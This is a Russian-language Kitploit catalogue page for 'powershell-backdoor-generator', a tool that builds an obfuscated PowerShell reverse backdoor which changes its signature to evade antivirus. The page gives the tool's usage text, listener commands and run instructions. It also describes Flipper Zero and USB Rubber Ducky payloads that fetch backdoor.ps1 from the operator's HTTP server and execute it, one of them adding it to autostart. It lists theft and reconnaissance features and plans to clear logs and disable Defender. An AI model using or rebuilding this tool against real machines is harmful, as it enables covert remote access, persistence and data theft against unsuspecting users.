Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
powershell-backdoor-generator — Обратный бэкдор, написанный на PowerShell и обфусцированный с помощью Python. Он генерирует полезные нагрузки для популярных хакерских устройств, таких как Flipper Zero и Hak5 USB Rubber Ducky, и изменяет свою сигнатуру после каждой сборки, чтобы избежать обнаружения антивирусами. | Kitploit
Инструменты/GitHubGitHub/drew-alleman/powershell-backdoor-generator
Генерация полезной нагрузкиГенерация Шеллкода
GitHubdrew-alleman/powershell-backdoor-generator

powershell-backdoor-generator

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Обратный бэкдор, написанный на PowerShell и обфусцированный с помощью Python. Он генерирует полезные нагрузки для популярных хакерских устройств, таких как Flipper Zero и Hak5 USB Rubber Ducky, и изменяет свою сигнатуру после каждой сборки, чтобы избежать обнаружения антивирусами.

413653 лет назадПроверено Kitploit
Поделиться

/******************************************************************************

  • ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ:
  • Данная программа предназначена исключительно для образовательных целей. Используя эту программу,
  • вы соглашаетесь с тем, что понимаете потенциальные риски, связанные с её использованием.
    • Эта программа не должна использоваться ни на одной системе или сети без соответствующего
  • разрешения. Несанкционированное использование строго запрещено.
    • Создатель этой программы не несёт ответственности за любой ущерб, юридические последствия
  • или потерю данных, вызванные использованием этой программы.
    • Вы обязаны соблюдать все применимые законы и нормативные акты при использовании этой программы.
  • Пожалуйста, используйте эту программу ответственно и этично, уважая конфиденциальность
  • и безопасность других. *****************************************************************************/

powershell-backdoor

Guide
Инструмент для обратного бэкдора, написанный на PowerShell и обфусцированный с помощью Python, обеспечивающий новую сигнатуру после каждой сборки для обхода обнаружения. Инструмент позволяет создавать полезные нагрузки для популярных хакерских устройств, таких как Flipper Zero и Hak5 USB Rubber Ducky. Используйте этот инструмент для проверки защиты вашей системы от продвинутых техник атак.

root@kitploit:~
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
                 [--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
  -h, --help            show this help message and exit
  --ip-address IP_ADDRESS, -i IP_ADDRESS
                        IP Address to bind the backdoor too (default: 192.168.X.XX)
  --port PORT, -p PORT  Port for the backdoor to connect over (default: 4444)
  --random, -r          Randomizes the outputed backdoor's file name
  --out OUT, -o OUT     Specify the backdoor filename (relative file names)
  --verbose, -v         Show verbose output
  --delay DELAY         Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
  --flipper FLIPPER     Payload file for flipper zero (includes EOL conversion) (relative file name)
  --ducky               Creates an inject.bin for the http server
  --server-port SERVER_PORT
                        Port to run the HTTP server on (--server) (default: 8080)
  --payload PAYLOAD     USB Rubber Ducky/Flipper Zero backdoor payload to execute
  --list--payloads      List all available payloads
  -k KEYBOARD, --keyboard KEYBOARD
                        Keyboard layout for Bad Usb/Flipper Zero (default: us)
  -A, --actually-listen
                        Just listen for any backdoor connections
  -H, --listen-and-host
                        Just listen for any backdoor connections and host the backdoor directory

Быстрые ссылки

  • Превью
  • Возможности
  • Стандартный бэкдор
  • Бэкдор для Flipper Zero
  • Бэкдор для USB Rubber Ducky
  • Благодарности
  • Планы
  • Результат 5 обфускаций

Превью

preview

Возможности

  • Полезная нагрузка для Hak5 Rubber Ducky
  • Полезная нагрузка для Flipper Zero
  • Скачивание файлов с удалённой системы
  • Воспроизведение wav-файлов по URL
  • Получение публичного IP-адреса целевого компьютера
  • Список локальных пользователей
  • Поиск интересных файлов
  • Сбор информации об операционной системе целевой системы
  • Получение информации BIOS целевой системы
  • Проверка наличия антивирусного ПО и его текущего статуса
  • Получение активных TCP-клиентов
  • Установка Chocolatey — популярного менеджера пакетов для Windows (https://chocolatey.org/)
  • Проверка наличия распространённого ПО для пентеста в целевой системе.

Стандартный бэкдор

root@kitploit:~
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

В текущей рабочей директории будет создан файл с именем backdoor.ps1.

Запуск бэкдора

Протестировано на Windows 11, Windows 10 и Kali Linux. Чтобы запустить его в скрытом окне с сохранением постоянного доступа, следуйте инструкции здесь

root@kitploit:~
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
root@kitploit:~
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1

Атаки с помощью Bad USB / USB Rubber Ducky

При использовании любой из этих атак будет открыт HTTP-сервер, хостящий бэкдор. После загрузки бэкдора HTTP-сервер будет остановлен.

Полезные нагрузки

  • Execute — Выполнить бэкдор
  • BindAndExecute — Поместить бэкдор в временную папку пользователя, привязать бэкдор к автозагрузке, а затем выполнить его (требуются права администратора).

Бэкдор для Flipper Zero

Ниже будет сгенерирован файл с именем powershell_backdoor.txt, который при активации на Flipper загрузит бэкдор с вашего компьютера по HTTP и выполнит его.

root@kitploit:~
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Поместите указанный текстовый файл (например, powershell_backdoor.txt) в ваш Flipper Zero. При выполнении полезной нагрузки будет загружен и выполнен файл backdoor.ps1.

Бэкдор для USB Rubber Ducky

Ниже приведена инструкция по созданию файла inject.bin для Hak5 USB Rubber Ducky.

root@kitploit:~
 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Файл с именем inject.bin будет помещён в вашу текущую рабочую директорию. Для этой функции требуется Java. При выполнении полезной нагрузки будет загружен и выполнен файл backdoor.ps1.

Благодарности

Для кодирования payload.txt в inject.bin для атак USB Rubber Ducky я использую encoder.jar, созданный midnitesnake.

Планы

  • Получение последних RDP-подключений
  • Смена обоев по URL
  • Поиск доступных для записи директорий
  • Очистка журналов
  • Отключение Defender

Результат 5 обфускаций

Ниже приведён sha1-хеш файла backdoor.ps1 после 5 сборок.

root@kitploit:~
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49
Скачать инструмент